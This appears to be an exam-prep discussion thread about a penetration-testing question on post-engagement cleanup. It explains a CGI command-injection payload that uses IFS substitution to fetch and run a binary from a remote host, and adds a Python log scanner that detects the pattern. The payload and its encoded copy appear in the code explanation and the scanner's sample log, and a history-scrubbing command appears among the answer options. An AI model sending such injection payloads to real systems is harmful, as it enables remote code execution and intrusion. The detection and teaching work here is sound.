A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: Which of the following commands should the penetration tester run post-engagement?
A. grep -v apache ~/bash_history > ~/.bash_history
B. rm -rf /tmp/apache
From the code snippet it appears that the penetration tester has used a POST exploit to gain access to a system and executed a command that downloads a file named "apache" from the IP address 10.10.0.1, and then it runs it. The command also changes the permissions of the file to 777 which means it's giving full permissions to all users.
After the engagement, the penetration tester should clean up the system and return it to its original state. One of the first steps should be to remove the "apache" file from the system using the command "rm -rf /tmp/apache" to remove the file and the folder recursively.
Option A is not recommended because it's removing the apache line from the bash history, but it doesn't remove the file. Option C is not recommended because it's changing the permissions of the file, but it doesn't remove the file. Option D is not recommended because it's killing the process, but it doesn't remove the file.
Code Explanation:
An HTTP POST method will be used to send data to the server.
The URL /cgi-bin/index.cgi?action=login&Path=... indicates that the exploit is trying to access a CGI script for the login action,
and Path variable contains a lot of concatenated commands!
/bin/sh$(system.IFS())-c$(system.IFS())'cd$(system.IFS())/tmp;:
opens a /bin/sh shell and changes the current directory to /tmp
wget$(system.IFS())http://10.10.0.1/apache;
it uses wget to download the file "apache" from a URL.
chmod${system.IFS()}777${system.IFS()}apache;:
./apache'%0A%27&loginUser=a&Pwd=a
it executes the downloaded "apache" file.
HTTP/1.1 indicates the version of the HTTP protocol to use.
system.IFS() is an Internal Field Separator; this variable defines the delimiters used by the system to separate words and tokens, generally spaces, tabs and newlines.
In this situation it allows commands to be concatenated.
not A. grep -v apache ~/bash_history > ~/.bash_history
because you are removing all commands containing the text "apache" from the bash_history: good after an attack, but too extreme and non-surgical/imprecise, indiscriminate.
(grep -v shows all rows except those matching the word, so you then replace the file with the "file without the word you searched for")
not C. chmod 600 /tmp/apache
The exploit code already changed the permissions to 777; why would you have to change them to less?
And it doesn't remove the apache file, which is the best action post-engagement.
not D. taskkill /IM "apache" /F
Windows command to terminate a process. The question implicitly specifies Linux as the operating system, and all the other answers are Linux too.
Good answer B. rm -rf /tmp/apache
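As an added defender-side example (not part of the ExamTopics thread, and not code from the exam question), the script below shows how the request shape discussed above can be picked out of ordinary web access logs. It assumes the `$(system.IFS())` text in the snippet stands for shell `${IFS}`/`$IFS` expansion, uses a Common Log Format line layout, constructs its own sample log lines (the first one mirrors the snippet's payload), and carries an indicator list that is an assumption to be tuned per environment.

```python
"""Detect IFS-substitution command injection in web access logs.

Added example (not from the ExamTopics thread): flags request targets that
carry shell ${IFS} / $IFS expansions, normalizes them to the command the
shell would actually run, and lists coarse indicators for the analyst.
"""
import re
from urllib.parse import unquote

# Common Log Format line: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# ${IFS}, ${IFS%?}-style variants, and bare $IFS: each expands to whitespace in sh
IFS_RE = re.compile(r'\$\{IFS[^}]*\}|\$IFS')

# Coarse post-normalization indicators (assumed list; tune per environment)
INDICATORS = ('/bin/sh', 'wget ', 'curl ', 'chmod 777', '/tmp')


def decode_target(target: str, rounds: int = 3) -> str:
    """URL-decode until stable (bounded) so double-encoded payloads are exposed."""
    current = target
    for _ in range(rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def normalize_ifs(text: str) -> str:
    """Replace each IFS expansion with a single space, as the shell would."""
    return IFS_RE.sub(' ', text)


def find_injection(line: str):
    """Return a finding dict for an IFS-injection request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a log line we understand; ignore rather than guess
    decoded = decode_target(m['target'])
    if not IFS_RE.search(decoded):
        return None
    normalized = normalize_ifs(decoded)
    return {
        'ip': m['ip'],
        'timestamp': m['ts'],
        'method': m['method'],
        'path': decoded.split('?', 1)[0],
        'normalized': normalized,
        'indicators': [i for i in INDICATORS if i in normalized],
    }


def scan(lines):
    """Run find_injection over an iterable of log lines; keep only hits."""
    return [hit for hit in map(find_injection, lines) if hit]


# Constructed sample lines (source IPs invented); the first mirrors the
# request shape in the thread, the others are benign traffic.
SAMPLE_LOG = [
    '10.10.0.5 - - [01/Jan/2024:10:00:00 +0000] "POST /cgi-bin/index.cgi?'
    'action=login&Path=%2Fbin%2Fsh%24%7BIFS%7D-c%24%7BIFS%7D%27cd%24%7BIFS%7D'
    '%2Ftmp%3Bwget%24%7BIFS%7Dhttp%3A%2F%2F10.10.0.1%2Fapache%3Bchmod%24%7BIFS%7D'
    '777%24%7BIFS%7Dapache%3B.%2Fapache%27%0A%27 HTTP/1.1" 200 512',
    '10.10.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '10.10.0.7 - - [01/Jan/2024:10:00:02 +0000] "POST /cgi-bin/index.cgi?'
    'action=login&Path=%2Fhome%2Fuser HTTP/1.1" 200 300',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['ip']} {hit['path']} "
              f"indicators={hit['indicators']}")
        print("  expands to:", hit['normalized'].replace('\n', '\\n'))
```

The normalization step is what makes the finding readable: once every IFS expansion is collapsed to a space, the analyst sees the same command chain the thread walks through (change into /tmp, fetch, chmod 777, execute) instead of the obfuscated form, and the indicator list gives a quick triage signal before anyone looks at the host. Bounded repeated decoding matters because a single `unquote` misses payloads that were percent-encoded twice.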
Why would it not be A. grep -v apache ~/bash_history > ~/.bash_history? This command will remove all lines from the ~/bash_history file that contain the word "apache". This covers tracks.
Because if you understand the snippet of code, it shows that the command injection is making the victim server download an executable into the /tmp directory, so it is clear that post exploitation you have to delete it. Clear answer is B.
The snippet of code appears to be a command injection exploit that uses the web application's login form to execute arbitrary commands on the server. The code downloads an executable named "apache" from a remote server and runs it with root privileges.
I totally read this as "Post exploitation" at first rather than "Post Engagement" That makes a bit of a difference LOL. B is going to be it, so you can remove installed tools from the tested device
I would do B, as the pen tester was the person who uploaded the file and knows its content. If I found such a file on a system, C would be an option to consider.
The most important thing before deleting the /tmp/apache directory is to change the permissions from 777 to 600.
Community vote distribution: A (35%), C (25%), B (20%), Other